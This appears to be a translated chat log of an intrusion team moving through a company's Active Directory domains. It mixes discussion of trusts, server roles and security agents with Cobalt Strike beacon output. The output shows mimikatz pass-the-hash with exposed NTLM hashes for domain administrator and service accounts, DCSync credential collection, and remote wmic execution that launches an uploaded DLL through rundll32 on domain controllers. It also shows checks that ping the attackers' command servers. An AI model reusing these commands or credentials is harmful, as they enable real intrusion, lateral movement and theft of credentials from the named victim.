``` 0: 80-20 80-20.com (Direct Outbound) (Direct Inbound) 1: LEGALCO legalco.local (Direct Outbound) (Direct Inbound) 2: FRD frd.global (Forest tree root) (Direct Outbound) (Direct Inbound) 3: ANSTAT Anstat.local (Direct Outbound) (Direct Inbound) 4: LEADERS leaders.frd.global 5: AUST standards.com.au (Direct Outbound) (Direct Inbound) 6: SAIGPROD SaigProd.local (Direct Outbound) (Direct Inbound) 7: C360 c360.local (Direct Outbound) (Direct Inbound) 8: DATACENTER datacenter.local (Direct Outbound) (Direct Inbound) 9: C360UK c360uk.local (Direct Outbound) (Direct Inbound) 10: SAIG saig.frd.global (Forest 2) (Primary Domain) (Native) ```
they're not 1-to-1
between the different domains where sessions are hanging
just compare net domain_trusts
the IP is one and the same
1 of them is in quarantine
there are definitely 2 datacenters in the trusts there
didn't get it
I at least noticed differences between frd.global and saig...., datacenter...
we'll have to go into the trusts later anyway
ok, for now finish the rest on the domain
-[ ](https://mediaeveryone.com/group/saiglobal-com?msg=BxbusgHiy84BsvA2G) trusts
new as in actually new, or trusts from this one?
10 - 0% loss
``` Web Server - 25 ``` and are there other servers in this category that respond to ping correctly?
so you still haven't dealt with the new domains?
persistence can be done tomorrow, or else look for more options
put them into 100% loss for now
in datacenter
from the DC? btw, where are you pinging from?
=> RDS and SSO go to disabled, do I leave the web ones?
besides, it's in 1 domain
the web ones aren't very critical I think
100% loss
of them
RDS - 2 Web Server - 25 SSO - 1
categories
purpose?
what is meant by "critical"
28
critical?
many of those?
do servers with 100% loss also go into Disabled?
right)
and now ping everything to find out which others are cut off :sunglasses:
yep
should I put them into Disabled Servers then?
``` beacon> shell ping USHDC1-CSPSPH01.datacenter.local [*] Tasked beacon to run: ping USHDC1-CSPSPH01.datacenter.local [+] host called home, sent: 68 bytes [+] received output: Ping request could not find host USHDC1-CSPSPH01.datacenter.local. Please check the name and try again. beacon> shell ping USHDC1-CSPSPH02.datacenter.local [*] Tasked beacon to run: ping USHDC1-CSPSPH02.datacenter.local [+] host called home, sent: 68 bytes [+] received output: Ping request could not find host USHDC1-CSPSPH02.datacenter.local. Please check the name and try again. 
```
These are those last ones
OU=C360 - SSO servers with various Outlook-ish services, I suppose; OU=SCCM - SCCM servers; the last one I don't know...
``` CN=USHDC1-CSPFPS03,OR=Production,OR=C360,OR=Servers,OR=0.SAI Global,DC=datacenter,DC=local >dNSHostName: USHDC1-CSPFPS03.datacenter.local >servicePrincipalName: CmRcService/USHDC1-CSPFPS03 >servicePrincipalName: CmRcService/USHDC1-CSPFPS03.datacenter.local >servicePrincipalName: WSMAN/USHDC1-CSPFPS03 >servicePrincipalName: WSMAN/USHDC1-CSPFPS03.datacenter.local >servicePrincipalName: TERMSRV/USHDC1-CSPFPS03 >servicePrincipalName: TERMSRV/USHDC1-CSPFPS03.datacenter.local >servicePrincipalName: RestrictedKrbHost/USHDC1-CSPFPS03 >servicePrincipalName: HOST/USHDC1-CSPFPS03 >servicePrincipalName: RestrictedKrbHost/USHDC1-CSPFPS03.datacenter.local >servicePrincipalName: HOST/USHDC1-CSPFPS03.datacenter.local ```
``` CN=USHDC1-CSPMGW02,OR=Production,OR=C360,OR=Servers,OR=0.SAI Global,DC=datacenter,DC=local >dNSHostName: USHDC1-CSPMGW02.datacenter.local >servicePrincipalName: WSMAN/USHDC1-CSPMGW02.datacenter.local >servicePrincipalName: WSMAN/USHDC1-CSPMGW02 >servicePrincipalName: CmRcService/USHDC1-CSPMGW02.datacenter.local >servicePrincipalName: CmRcService/USHDC1-CSPMGW02 >servicePrincipalName: TERMSRV/USHDC1-CSPMGW02.datacenter.local >servicePrincipalName: TERMSRV/USHDC1-CSPMGW02 >servicePrincipalName: RestrictedKrbHost/USHDC1-CSPMGW02 >servicePrincipalName: HOST/USHDC1-CSPMGW02 >servicePrincipalName: RestrictedKrbHost/USHDC1-CSPMGW02.datacenter.local >servicePrincipalName: HOST/USHDC1-CSPMGW02.datacenter.local ```
``` CN=USHDC1-CSPAPP23,OR=Production,OR=C360,OR=Servers,OR=0.SAI Global,DC=datacenter,DC=local >dNSHostName: USHDC1-CSPAPP23.datacenter.local >servicePrincipalName: CmRcService/USHDC1-CSPAPP23 >servicePrincipalName: CmRcService/USHDC1-CSPAPP23.datacenter.local >servicePrincipalName: WSMAN/USHDC1-CSPAPP23 >servicePrincipalName: WSMAN/USHDC1-CSPAPP23.datacenter.local >servicePrincipalName: TERMSRV/USHDC1-CSPAPP23 
>servicePrincipalName: TERMSRV/USHDC1-CSPAPP23.datacenter.local >servicePrincipalName: RestrictedKrbHost/USHDC1-CSPAPP23 >servicePrincipalName: HOST/USHDC1-CSPAPP23 >servicePrincipalName: RestrictedKrbHost/USHDC1-CSPAPP23.datacenter.local >servicePrincipalName: HOST/USHDC1-CSPAPP23.datacenter.local ```
``` CN=USHDC1-COPSCM02,OR=SCCM,OR=Corporate IT,OR=Servers,OR=0.SAI Global,DC=datacenter,DC=local >dNSHostName: USHDC1-COPSCM02.datacenter.local >servicePrincipalName: CmRcService/USHDC1-COPSCM02.datacenter.local >servicePrincipalName: CmRcService/USHDC1-COPSCM02 >servicePrincipalName: WSMAN/USHDC1-COPSCM02.datacenter.local >servicePrincipalName: WSMAN/USHDC1-COPSCM02 >servicePrincipalName: TERMSRV/USHDC1-COPSCM02.datacenter.local >servicePrincipalName: TERMSRV/USHDC1-COPSCM02 >servicePrincipalName: RestrictedKrbHost/USHDC1-COPSCM02 >servicePrincipalName: HOST/USHDC1-COPSCM02 >servicePrincipalName: RestrictedKrbHost/USHDC1-COPSCM02.datacenter.local >servicePrincipalName: HOST/USHDC1-COPSCM02.datacenter.local ```
``` CN=USHDC1-CSPSPH02,OR=Production,OR=DM360,OR=Servers,OR=0.SAI Global,DC=datacenter,DC=local >dNSHostName: USHDC1-CSPSPH02.datacenter.local >servicePrincipalName: CmRcService/USHDC1-CSPSPH02.datacenter.local >servicePrincipalName: CmRcService/USHDC1-CSPSPH02 >servicePrincipalName: WSMAN/USHDC1-CSPSPH02.datacenter.local >servicePrincipalName: WSMAN/USHDC1-CSPSPH02 >servicePrincipalName: TERMSRV/USHDC1-CSPSPH02 >servicePrincipalName: TERMSRV/USHDC1-CSPSPH02.datacenter.local >servicePrincipalName: RestrictedKrbHost/USHDC1-CSPSPH02 >servicePrincipalName: HOST/USHDC1-CSPSPH02 >servicePrincipalName: RestrictedKrbHost/USHDC1-CSPSPH02.datacenter.local >servicePrincipalName: HOST/USHDC1-CSPSPH02.datacenter.local ```
all
*send the full hostnames with groups
MX, yes
it would speed up the work process
they come up not for the first time
and also, what do these point to: FPS MGW ARP SCM SEC SPH ?
``` USHDC1-360MX2.datacenter.local USHDC1-360MX1.datacenter.local ``` These are Exchange then?
here in the network there's rapid7; need to look on the techies' machines for access to its console
specify it...
as file server
``` Image Name PID Session Name Session# Mem Usage User Name CPU Time ========================= ======== ================ =========== ============ ================================================== ============ System Idle Process 0 Services 0 4 K NT AUTHORITY\SYSTEM 827:32:16 System 4 Services 0 264 K N/A 5:43:18 smss.exe 224 Services 0 1,036 K NT AUTHORITY\SYSTEM 0:00:00 csrss.exe 340 Services 0 3,964 K NT AUTHORITY\SYSTEM 0:00:25 csrss.exe 396 Console 1 3,472 K NT AUTHORITY\SYSTEM 0:00:00 wininit.exe 404 Services 0 3,896 K NT AUTHORITY\SYSTEM 0:00:00 winlogon.exe 448 Console 1 5,900 K NT AUTHORITY\SYSTEM 0:00:00 services.exe 492 Services 0 10,908 K NT AUTHORITY\SYSTEM 0:52:07 lsass.exe 500 Services 0 17,576 K NT AUTHORITY\SYSTEM 0:06:28 svchost.exe 560 Services 0 9,644 K NT AUTHORITY\SYSTEM 0:01:19 svchost.exe 592 Services 0 9,244 K NT AUTHORITY\NETWORK SERVICE 0:03:50 LogonUI.exe 688 Console 1 27,424 K NT AUTHORITY\SYSTEM 0:00:00 MsMpEng.exe 700 Services 0 243,516 K NT AUTHORITY\SYSTEM 2:25:24 dwm.exe 712 Console 1 30,044 K Window Manager\DWM-1 0:00:00 svchost.exe 816 Services 0 15,376 K NT AUTHORITY\LOCAL SERVICE 0:08:36 svchost.exe 844 Services 0 15,452 K NT AUTHORITY\SYSTEM 0:00:36 svchost.exe 860 Services 0 86,460 K NT AUTHORITY\SYSTEM 1:19:39 svchost.exe 912 Services 0 12,748 K NT AUTHORITY\LOCAL SERVICE 0:00:25 svchost.exe 992 Services 0 21,736 K NT AUTHORITY\NETWORK SERVICE 0:05:02 svchost.exe 532 Services 0 11,000 K NT AUTHORITY\LOCAL SERVICE 0:00:29 spoolsv.exe 1108 Services 0 13,520 K NT AUTHORITY\SYSTEM 0:00:13 svchost.exe 1148 Services 0 7,856 K NT AUTHORITY\SYSTEM 0:00:05 ir_agent.exe 1172 Services 0 13,176 K NT AUTHORITY\SYSTEM 0:01:04 conhost.exe 1292 Services 0 3,016 K NT AUTHORITY\SYSTEM 0:00:02 snmp.exe 1304 Services 0 6,856 K NT AUTHORITY\SYSTEM 0:03:05 svchost.exe 1336 Services 0 13,584 K NT AUTHORITY\SYSTEM 0:00:59 vmtoolsd.exe 1352 Services 0 13,800 K NT 
AUTHORITY\SYSTEM 0:09:42 ir_agent.exe 1372 Services 0 63,968 K NT AUTHORITY\SYSTEM 1:09:54 WmiApSrv.exe 1460 Services 0 8,472 K NT AUTHORITY\SYSTEM 0:01:01 wmi_exporter.exe 1484 Services 0 16,032 K NT AUTHORITY\SYSTEM 0:00:32 WmiPrvSE.exe 1624 Services 0 23,088 K NT AUTHORITY\NETWORK SERVICE 1:55:27 WmiPrvSE.exe 1640 Services 0 48,744 K NT AUTHORITY\SYSTEM 0:31:54 svchost.exe 1908 Services 0 8,936 K NT AUTHORITY\NETWORK SERVICE 0:00:31 svchost.exe 2012 Services 0 4,792 K NT AUTHORITY\NETWORK SERVICE 0:00:02 dllhost.exe 2132 Services 0 11,008 K NT AUTHORITY\SYSTEM 0:00:04 msdtc.exe 2484 Services 0 7,336 K NT AUTHORITY\NETWORK SERVICE 0:00:04 WmiPrvSE.exe 2572 Services 0 29,720 K NT AUTHORITY\SYSTEM 0:19:40 CcmExec.exe 3696 Services 0 113,032 K NT AUTHORITY\SYSTEM 0:11:09 WmiPrvSE.exe 3804 Services 0 13,636 K NT AUTHORITY\SYSTEM 0:00:37 ir_agent.exe 3964 Services 0 92,692 K NT AUTHORITY\SYSTEM 0:40:51 ir_agent.exe 3972 Services 0 63,404 K NT AUTHORITY\SYSTEM 0:25:50 ir_agent.exe 4016 Services 0 47,476 K NT AUTHORITY\SYSTEM 0:06:02 CmRcService.exe 1648 Services 0 8,784 K NT AUTHORITY\SYSTEM 0:00:14 WmiPrvSE.exe 3320 Services 0 6,708 K NT AUTHORITY\LOCAL SERVICE 0:00:01 WmiPrvSE.exe 3048 Services 0 10,388 K NT AUTHORITY\LOCAL SERVICE 0:02:01 ir_agent.exe 2832 Services 0 55,420 K NT AUTHORITY\SYSTEM 0:06:02 ir_agent.exe 2392 Services 0 51,596 K NT AUTHORITY\SYSTEM 0:26:38 xagt.exe 3944 Services 0 7,272 K NT AUTHORITY\SYSTEM 0:00:02 WmiPrvSE.exe 3280 Services 0 8,820 K NT AUTHORITY\LOCAL SERVICE 0:00:00 WmiPrvSE.exe 3600 Services 0 8,176 K NT AUTHORITY\SYSTEM 0:00:00 WmiPrvSE.exe 3396 Services 0 12,148 K NT AUTHORITY\SYSTEM 0:00:00 msiexec.exe 2712 Services 0 5,868 K NT AUTHORITY\SYSTEM 0:00:00 ``покажи пиды пожалуйстапутано очень...DC - указание на домен контроллер FS - указание на файловый сервер 360 - указание на эксчендж вообще, точнее на ССО авторизацию через офис360у этой тачкиа у него один интерфейс?у дк же в спн лдапы, да и в оушке должно быть написаноне? 
) this is a domain controller....
```
CN=USHDC1-360FS1,OU=Production,OU=C360,OU=Servers,OU=0.SAI Global,DC=datacenter,DC=local
>dNSHostName: USHDC1-360FS1.datacenter.local
>servicePrincipalName: CmRcService/USHDC1-360FS1.datacenter.local
>servicePrincipalName: CmRcService/USHDC1-360FS1
>servicePrincipalName: WSMAN/USHDC1-360FS1.datacenter.local
>servicePrincipalName: WSMAN/USHDC1-360FS1
>servicePrincipalName: TERMSRV/USHDC1-360FS1
>servicePrincipalName: TERMSRV/USHDC1-360FS1.datacenter.local
>servicePrincipalName: RestrictedKrbHost/USHDC1-360FS1
>servicePrincipalName: HOST/USHDC1-360FS1
>servicePrincipalName: RestrictedKrbHost/USHDC1-360FS1.datacenter.local
>servicePrincipalName: HOST/USHDC1-360FS1.datacenter.local
```
welll, probably... and what is the host called, and what OU / group is it in?
hm
can I put it under DEV?
```
Name
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40660
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219
Microsoft Visual C++ 2005 Redistributable (x64)
VMware Tools
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.60610
Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.60610
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40660
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.60610
Windows Firewall Configuration Provider
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
Microsoft Forefront Endpoint Protection 2010 Server Management
FireEye Endpoint Agent
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40660
Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.60610
Configuration Manager Client
Microsoft RichCopy 4.0
Microsoft Endpoint Protection Management Components
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40660
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
Windows Resource Kit Tools - SubInAcl.exe
Microsoft Silverlight
Microsoft Security Client
Microsoft Policy Platform
WMI Exporter
Rapid7 Insight Agent
```
that also worked
```
shell wmic /node:10.225.10.202 product get name
```
and the tasklist under the token returned
try via wmic, maybe the port is closed...
under the token?
```
beacon> shell tasklist /s 10.225.10.202 /v
[*] Tasked beacon to run: tasklist /s 10.225.10.202 /v
[+] host called home, sent: 59 bytes
```
yeah
last time I didn't get a chance to request the tasklists
I still have to sort the ones at the bottom, and make the "server catalog" by purpose
right
1
```
dn:CN=saig.frd.global,CN=System,DC=datacenter,DC=local
>whenCreated: 2018/06/09-00:59:39 AUS Eastern Daylight Time
>name: saig.frd.global
>securityIdentifier: S-1-5-21-2959458370-3657645319-1944215935
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: saig.frd.global
>trustType: 2 [UpLevel(2)]
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=frd.global,CN=System,DC=datacenter,DC=local
>whenCreated: 2018/04/14-00:59:25 AUS Eastern Daylight Time
>name: frd.global
>securityIdentifier: S-1-5-21-2724714270-1340506477-316473475
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: frd.global
>trustType: 2 [UpLevel(2)]
>trustAttributes: 8 [Transitive(8)]
```
collected in datacenter: AdFind, DA, EA, LA, DC, DCSync
all the trusts collected?
now I look for the AV creds and the NASes, right?
yes)
finally
after a thousand years
that's it, I'm in datacenter))
the DLL is for my cobalt
damn it
```
beacon> pth datacenter.local\Administrator c49d5b83342b859132197d0a73592c0e
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:Administrator /domain:datacenter.local /ntlm:c49d5b83342b859132197d0a73592c0e /run:"%COMSPEC% /c echo d8c5e886568 > \\.\pipe\da5531" command
[+] host called home, sent: 438886 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user    : Administrator
domain  : datacenter.local
program : C:\Windows\system32\cmd.exe /c echo d8c5e886568 > \\.\pipe\da5531
impers. : no
NTLM    : c49d5b83342b859132197d0a73592c0e
  |  PID  6988
  |  TID  4548
  |  LSA Process is now R/W
  |  LUID 0 ; 1615963531 (000000:6051a58b)
  \_ msv1_0   - data copy @ 0000006D65B9E580 : OK !
  \_ kerberos - data copy @ 0000006D6776F5E8
   \_ aes256_hmac       -> null
   \_ aes128_hmac       -> null
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ des_cbc_md5       -> null
   \_ des_cbc_crc       -> null
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 0000006D65B7B1A8 (16) -> null

beacon> shell wmic /node:10.225.10.201 process call create "cmd /c ping stormname.com > C:\ProgramData\p.txt"
[*] Tasked beacon to run: wmic /node:10.225.10.201 process call create "cmd /c ping stormname.com > C:\ProgramData\p.txt"
[+] host called home, sent: 126 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 3312;
        ReturnValue = 0;
};

beacon> shell type \\10.225.10.201\C$\ProgramData\p.txt
[*] Tasked beacon to run: type \\10.225.10.201\C$\ProgramData\p.txt
[+] host called home, sent: 72 bytes
[+] received output:

Pinging stormname.com [104.200.67.11] with 32 bytes of data:
Reply from 104.200.67.11: bytes=32 time=51ms TTL=55
Reply from 104.200.67.11: bytes=32 time=51ms TTL=55
Reply from 104.200.67.11: bytes=32 time=51ms TTL=55
Reply from 104.200.67.11: bytes=32 time=51ms TTL=55

Ping statistics for 104.200.67.11:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 51ms, Maximum = 51ms, Average = 51ms

beacon> rm \\10.225.10.201\C$\ProgramData\p.txt
[*] Tasked beacon to remove \\10.225.10.201\C$\ProgramData\p.txt
[+] host called home, sent: 44 bytes

beacon> upload /home/user/Desktop/cobalt/dll_maker/x64.dll
[*] Tasked beacon to upload /home/user/Desktop/cobalt/dll_maker/x64.dll as x64.dll
[+] host called home, sent: 139699 bytes

beacon> shell copy x64.dll \\10.225.10.201\C$\ProgramData\
[*] Tasked beacon to run: copy x64.dll \\10.225.10.201\C$\ProgramData\
[+] host called home, sent: 75 bytes
[+] received output:
        1 file(s) copied.

beacon> shell wmic /node:10.225.10.201 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[*] Tasked beacon to run: wmic /node:10.225.10.201 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[+] host called home, sent: 120 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 4664;
        ReturnValue = 0;
};

beacon> shell dir \\10.225.10.201\C$\ProgramData\x64.dll
[*] Tasked beacon to run: dir \\10.225.10.201\C$\ProgramData\x64.dll
[+] host called home, sent: 73 bytes
[+] received output:
 Volume in drive \\10.225.10.201\C$ has no label.
 Volume Serial Number is 2AC9-2F68

 Directory of \\10.225.10.201\C$\ProgramData

File Not Found
```
trying from @user3's cobalt, it doesn't pull in either, although it pings the cobalt :^(
how come it sees everyone but not me
```
user 2-2[AUHDC1-COPADS01]SYSTEM */5008|20Oct07 23:48:21> shell wmic /node:10.225.10.201 process call create "cmd /c ping passloft.com > C:\ProgramData\p.txt"
[*] Tasked beacon to run: wmic /node:10.225.10.201 process call create "cmd /c ping passloft.com > C:\ProgramData\p.txt"
[+] host called home, sent: 125 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 464;
        ReturnValue = 0;
};

[+] host called home, sent: 32 bytes
[+] host called home, sent: 32 bytes

user 2-2[AUHDC1-COPADS01]SYSTEM */5008|20Oct07 23:49:20> shell type \\10.225.10.201\C$\ProgramData\p.txt
[*] Tasked beacon to run: type \\10.225.10.201\C$\ProgramData\p.txt
[+] host called home, sent: 72 bytes
[+] received output:

Pinging passloft.com [192.169.7.15] with 32 bytes of data:
Reply from 192.169.7.15: bytes=32 time=52ms TTL=55
Reply from 192.169.7.15: bytes=32 time=51ms TTL=55
Reply from 192.169.7.15: bytes=32 time=52ms TTL=55
Reply from 192.169.7.15: bytes=32 time=52ms TTL=55

Ping statistics for 192.169.7.15:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 51ms, Maximum = 52ms, Average = 51ms

user 2-2[AUHDC1-COPADS01]SYSTEM */5008|20Oct07 23:49:51> rm \\10.225.10.201\C$\ProgramData\p.txt
[*] Tasked beacon to remove \\10.225.10.201\C$\ProgramData\p.txt
[+] host called home, sent: 44 bytes
```
dal
so is it really not easier to just give the password to your cobalt?
do you want to set up some kind of listener on the saiglobal.com DC?
the initiator will explain now
didn't get it?)
and what if the saiglobal.com DC passes the traffic through itself?
I think @user1 doesn't mind
then can I work with it from .128?
and it puts load on your address
since it doesn't pass traffic through itself
ehne
given that it doesn't see my cobalt
will it work?
and what if he pulls it in to himself, and then spawns one to me
work from his cobalt?
+
user1's cobalt pinged
check availability
take a colleague's cobalt
well, there's the answer)
```
beacon> shell type \\10.225.10.201\C$\ProgramData\sq.txt
[*] Tasked beacon to run: type \\10.225.10.201\C$\ProgramData\sq.txt
[+] host called home, sent: 73 bytes
[+] received output:

Pinging firedi.com [23.106.215.146] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for 23.106.215.146:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
```
you're trying to pull them in)
ping from there to your cobalt
```
beacon> shell ping firedi.com
[*] Tasked beacon to run: ping firedi.com
[+] host called home, sent: 46 bytes
[+] received output:

Pinging firedi.com [23.106.215.146] with 32 bytes of data:
Reply from 23.106.215.146: bytes=32 time=70ms TTL=54
Reply from 23.106.215.146: bytes=32 time=69ms TTL=54
Reply from 23.106.215.146: bytes=32 time=68ms TTL=54
Reply from 23.106.215.146: bytes=32 time=68ms TTL=54

Ping statistics for 23.106.215.146:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 68ms, Maximum = 70ms, Average = 68ms
```
try pinging your cobalt
```
beacon> pth datacenter.local\Administrator c49d5b83342b859132197d0a73592c0e
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:Administrator /domain:datacenter.local /ntlm:c49d5b83342b859132197d0a73592c0e /run:"%COMSPEC% /c echo a8192f714f5 > \\.\pipe\da0134" command
[+] host called home, sent: 438886 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user    : Administrator
domain  : datacenter.local
program : C:\Windows\system32\cmd.exe /c echo a8192f714f5 > \\.\pipe\da0134
impers. : no
NTLM    : c49d5b83342b859132197d0a73592c0e
  |  PID  6148
  |  TID  4308
  |  LSA Process is now R/W
  |  LUID 0 ; 1594533110 (000000:5f0aa4f6)
  \_ msv1_0   - data copy @ 0000006D664CBE00 : OK !
  \_ kerberos - data copy @ 0000006D665014C8
   \_ aes256_hmac       -> null
   \_ aes128_hmac       -> null
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ des_cbc_md5       -> null
   \_ des_cbc_crc       -> null
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 0000006D664D0B18 (16) -> null

beacon> shell dir \\10.225.10.201\C$\ProgramData\
[*] Tasked beacon to run: dir \\10.225.10.201\C$\ProgramData\
[+] host called home, sent: 66 bytes
[+] received output:
 Volume in drive \\10.225.10.201\C$ has no label.
 Volume Serial Number is 2AC9-2F68

 Directory of \\10.225.10.201\C$\ProgramData

07/16/2016  09:23 AM    <DIR>          Comms
10/06/2020  12:45 AM    <DIR>          FireEye
10/06/2020  08:24 AM             8,192 ntuser.dat
05/30/2019  02:57 PM    <DIR>          Package Cache
04/24/2019  03:13 PM    <DIR>          regid.1991-06.com.microsoft
07/16/2016  09:23 AM    <DIR>          SoftwareDistribution
02/02/2018  03:38 PM    <DIR>          USOPrivate
02/02/2018  03:38 PM    <DIR>          USOShared
03/13/2019  01:10 PM    <DIR>          VMware
               1 File(s)          8,192 bytes
               8 Dir(s)  61,425,848,320 bytes free

beacon> shell wmic /node:10.225.10.201 process call create "cmd /c ping google.com > C:\ProgramData\p.txt"
[*] Tasked beacon to run: wmic /node:10.225.10.201 process call create "cmd /c ping google.com > C:\ProgramData\p.txt"
[+] host called home, sent: 123 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 5972;
        ReturnValue = 0;
};

beacon> shell type \\10.225.10.201\C$\ProgramData\p.txt
[*] Tasked beacon to run: type \\10.225.10.201\C$\ProgramData\p.txt
[+] host called home, sent: 72 bytes
[+] received output:

Pinging google.com [108.177.122.100] with 32 bytes of data:
Reply from 108.177.122.100: bytes=32 time=2ms TTL=106
Reply from 108.177.122.100: bytes=32 time=1ms TTL=106
Reply from 108.177.122.100: bytes=32 time=1ms TTL=106
Reply from 108.177.122.100: bytes=32 time=2ms TTL=106

Ping statistics for 108.177.122.100:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 1ms, Maximum = 2ms, Average = 1ms

beacon> rm \\10.225.10.201\C$\ProgramData\p.txt
[*] Tasked beacon to remove \\10.225.10.201\C$\ProgramData\p.txt
[+] host called home, sent: 44 bytes

beacon> shell dir
[*] Tasked beacon to run: dir
[+] host called home, sent: 34 bytes
[+] received output:
 Volume in drive C is System
 Volume Serial Number is 9AA9-9DAB

 Directory of C:\ProgramData

07/27/2018  07:11 AM    <DIR>          AppData
10/06/2020  12:20 AM    <DIR>          FireEye
02/29/2020  03:37 PM    <DIR>          GetSupportService_N-Central
02/17/2020  02:15 PM    <DIR>          N-Able Technologies
10/07/2020  04:09 AM           262,144 ntuser.dat
08/23/2020  12:22 AM    <DIR>          Package Cache
11/21/2014  08:58 PM    <DIR>          regid.1991-06.com.microsoft
07/27/2018  07:11 AM    <DIR>          SnowSoftware
05/19/2020  01:19 PM    <DIR>          SolarWinds MSP
04/25/2020  12:00 AM    <DIR>          Tenable
07/25/2020  11:30 AM    <DIR>          VMware
10/07/2020  03:31 PM           139,680 x64.dll
               2 File(s)        401,824 bytes
              10 Dir(s)  24,960,004,096 bytes free

beacon> shell copy x64.dll \\10.225.10.201\C$\ProgramData\
[*] Tasked beacon to run: copy x64.dll \\10.225.10.201\C$\ProgramData\
[+] host called home, sent: 75 bytes
[+] received output:
        1 file(s) copied.

beacon> shell wmic /node:10.225.10.201 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[*] Tasked beacon to run: wmic /node:10.225.10.201 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[+] host called home, sent: 120 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 6624;
        ReturnValue = 0;
};

beacon> shell dir \\10.225.10.201\C$\ProgramData\x64.dll
[*] Tasked beacon to run: dir \\10.225.10.201\C$\ProgramData\x64.dll
[+] host called home, sent: 73 bytes
[+] received output:
 Volume in drive \\10.225.10.201\C$ has no label.
 Volume Serial Number is 2AC9-2F68

 Directory of \\10.225.10.201\C$\ProgramData

File Not Found
```
nothing, again
trying the second DC
the others too?
well, 1 doesn't pull in
are there that few servers in datacenter or what
I already wrote it
exactly
I took the creds from the sync
on datacenter the DLL didn't work
oh wait
did they change the passwords of all the admins there?
here's the dcsync from this domain
the ones I got in with last time
those didn't fit
no creds for datacenter
SaigProd.local [10.195.100.1]
is this the one you're going into?
```
datacenter.local [10.225.10.200]
```
you mean this one?
```
saig.frd.global [10.210.8.236]
datacenter.local [10.225.10.200]
frd.global [10.225.12.1]
SaigProd.local [10.195.100.1]
c360.local [10.195.43.2]
legalco.local [10.195.23.1]
```
are the other servers closed too?
```
beacon> shell type \\10.195.100.1\C$\ProgramData\p.txt
[*] Tasked beacon to run: type \\10.195.100.1\C$\ProgramData\p.txt
[+] host called home, sent: 71 bytes
[+] received output:

Pinging google.com [216.58.196.142] with 32 bytes of data:
Reply from 216.58.196.142: bytes=32 time=2ms TTL=114
Reply from 216.58.196.142: bytes=32 time=2ms TTL=114
Reply from 216.58.196.142: bytes=32 time=2ms TTL=114
Reply from 216.58.196.142: bytes=32 time=2ms TTL=114

Ping statistics for 216.58.196.142:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 2ms, Maximum = 2ms, Average = 2ms
```
and in the file?
```
beacon> shell wmic /node:10.195.100.1 process call create "cmd /c ping google.com > C:\ProgramData\p.txt"
[*] Tasked beacon to run: wmic /node:10.195.100.1 process call create "cmd /c ping google.com > C:\ProgramData\p.txt"
[+] host called home, sent: 122 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 5772;
        ReturnValue = 0;
};

beacon> shell dir \\10.195.100.1\C$\ProgramData\p.txt
[*] Tasked beacon to run: dir \\10.195.100.1\C$\ProgramData\p.txt
[+] host called home, sent: 70 bytes
[+] received output:
 Volume in drive \\10.195.100.1\C$ has no label.
 Volume Serial Number is B042-5E3A

 Directory of \\10.195.100.1\C$\ProgramData

10/07/2020  03:38 PM               472 p.txt
               1 File(s)            472 bytes
               0 Dir(s)  63,656,124,416 bytes free
```
so you still haven't pinged google from there?
does it even see the outside?
xD
no session again, nothing at all
```
beacon> pth SaigProd.local\svc.sccmcliinst aa9249f57aba289658fde8afe795fd67
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:svc.sccmcliinst /domain:SaigProd.local /ntlm:aa9249f57aba289658fde8afe795fd67 /run:"%COMSPEC% /c echo bc8a1c163ef > \\.\pipe\ef7d36" command
[+] host called home, sent: 23 bytes
[+] host called home, sent: 438863 bytes
